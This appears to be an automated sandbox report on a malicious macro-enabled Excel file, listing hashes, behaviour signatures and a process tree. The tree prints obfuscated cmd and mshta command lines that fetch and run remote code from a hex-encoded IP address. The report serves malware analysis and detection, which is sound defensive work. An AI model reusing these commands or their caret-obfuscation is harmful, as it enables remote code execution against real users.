Analysis
- max time kernel: 151s
- max time network: 131s
- platform: windows10_x64
- resource: win10-en-20211208
- submitted: 19-01-2022 10:02
Behavioral task: behavioral1
- Sample: bedfbe47fbde08c3b2471c10061982611d471e5feae913cb7f91e63003a1a5cc.xlsm
- Resource: win10-en-20211208
General
- Target: bedfbe47fbde08c3b2471c10061982611d471e5feae913cb7f91e63003a1a5cc.xlsm
- Size: 114KB
- MD5: 254ffcdec7238f1444fe24932ce54457
- SHA1: f279f9375c94edc055cb29d3d511c2b984eea05a
- SHA256: bedfbe47fbde08c3b2471c10061982611d471e5feae913cb7f91e63003a1a5cc
- SHA512: 559fa4d2a1cb30817e0560c676f077884299dd3ec4a8d1955e7058a63c0e2d4e723c76f68b940353163f45d737d0023128c37cd4be26b2728fd71e0981af224a
Malware Config
- Extracted URL: http://0x5cff39c3/sec/sec.html
Signatures
- Process spawned unexpected child process (1 IoC)
  This typically indicates the parent process was compromised via an exploit or macro.
  Processes: cmd.exe
  description | pid | pid_target | process | target process
  Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process | 5116 | 2272 | cmd.exe | EXCEL.EXE
- Blocklisted process makes network request (1 IoC)
  Processes: mshta.exe
  flow | pid | process
  52 | 4500 | mshta.exe
- Checks processor information in registry (2 TTPs, 3 IoCs)
  Processor information is often read in order to detect sandboxing environments.
  Processes: EXCEL.EXE
  description | ioc | process
  Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | EXCEL.EXE
  Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | EXCEL.EXE
  Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | EXCEL.EXE
- Enumerates system info in registry (2 TTPs, 3 IoCs)
  Processes: EXCEL.EXE
  description | ioc | process
  Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | EXCEL.EXE
  Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily | EXCEL.EXE
  Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | EXCEL.EXE
- Suspicious behavior: AddClipboardFormatListener (1 IoC)
  Processes: EXCEL.EXE
  pid | process
  2272 | EXCEL.EXE
- Suspicious use of FindShellTrayWindow (2 IoCs)
  Processes: EXCEL.EXE
  pid | process
  2272 | EXCEL.EXE (2 entries, identical)
- Suspicious use of SetWindowsHookEx (20 IoCs)
  Processes: EXCEL.EXE
  pid | process
  2272 | EXCEL.EXE (20 entries, identical)
- Suspicious use of WriteProcessMemory (4 IoCs)
  Processes: EXCEL.EXE, cmd.exe
  description | pid | process | target process
  PID 2272 wrote to memory of 5116 | 2272 | EXCEL.EXE | cmd.exe (2 entries, identical)
  PID 5116 wrote to memory of 4500 | 5116 | cmd.exe | mshta.exe (2 entries, identical)
Processes (process tree; depth shown by the leading number)
- 1: C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE
  Command line: "C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\bedfbe47fbde08c3b2471c10061982611d471e5feae913cb7f91e63003a1a5cc.xlsm"
  - Checks processor information in registry
  - Enumerates system info in registry
  - Suspicious behavior: AddClipboardFormatListener
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of SetWindowsHookEx
  - Suspicious use of WriteProcessMemory
- 2 (child of 1): C:\Windows\SYSTEM32\cmd.exe
  Command line: cmd /c m^sh^t^a h^tt^p^:/^/0x5cff39c3/sec/sec.html
  - Process spawned unexpected child process
  - Suspicious use of WriteProcessMemory
- 3 (child of 2): C:\Windows\system32\mshta.exe
  Command line: mshta http://0x5cff39c3/sec/sec.html
  - Blocklisted process makes network request